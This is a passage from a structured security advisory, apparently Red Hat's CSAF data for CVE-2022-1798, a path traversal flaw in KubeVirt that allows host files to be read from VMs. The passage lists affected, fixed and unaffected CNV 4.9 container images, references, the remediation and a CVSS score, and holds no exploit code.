"8Base-CNV-4.9:container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", }, product_reference: "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", }, product_reference: "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", }, product_reference: "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", }, product_reference: "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", }, product_reference: "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", }, product_reference: "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", }, product_reference: "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", }, product_reference: "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", }, product_reference: "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", }, product_reference: "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", }, product_reference: "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", }, product_reference: "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", }, product_reference: "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", }, product_reference: "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", }, product_reference: "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", }, product_reference: "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", }, product_reference: "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", }, product_reference: "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", }, product_reference: "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", }, product_reference: "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", }, product_reference: "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", }, product_reference: "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", }, product_reference: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, ], }, vulnerabilities: [ { acknowledgments: [ { names: [ "Oliver Brooks and James Klopchic", ], organization: "NCC Group", }, ], cve: "CVE-2022-1798", cwe: { id: "CWE-22", name: "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", }, discovery_date: "2022-08-12T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.9:container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", "8Base-CNV-4.9:container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", "8Base-CNV-4.9:container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", "8Base-CNV-4.9:container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", "8Base-CNV-4.9:container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", "8Base-CNV-4.9:container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", "8Base-CNV-4.9:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", "8Base-CNV-4.9:container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", "8Base-CNV-4.9:container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", "8Base-CNV-4.9:container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", "8Base-CNV-4.9:container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", "8Base-CNV-4.9:container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2117872", }, ], notes: [ { category: "description", text: "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.", title: "Vulnerability description", }, { category: "summary", text: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.9:container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", ], known_not_affected: [ "8Base-CNV-4.9:container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", "8Base-CNV-4.9:container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", "8Base-CNV-4.9:container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", "8Base-CNV-4.9:container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", "8Base-CNV-4.9:container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", "8Base-CNV-4.9:container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", "8Base-CNV-4.9:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", "8Base-CNV-4.9:container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", "8Base-CNV-4.9:container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", "8Base-CNV-4.9:container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", "8Base-CNV-4.9:container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", "8Base-CNV-4.9:container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1798", }, { category: "external", summary: "RHBZ#2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1798", url: "https://www.cve.org/CVERecord?id=CVE-2022-1798", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", }, { category: "external", summary: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", url: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", }, ], release_date: "2022-08-08T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-22T08:16:30+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.9:container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6681", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.7, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", version: "3.1", }, products: [ "8Base-CNV-4.9:container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", "8Base-CNV-4.9:container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", "8Base-CNV-4.9:container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", 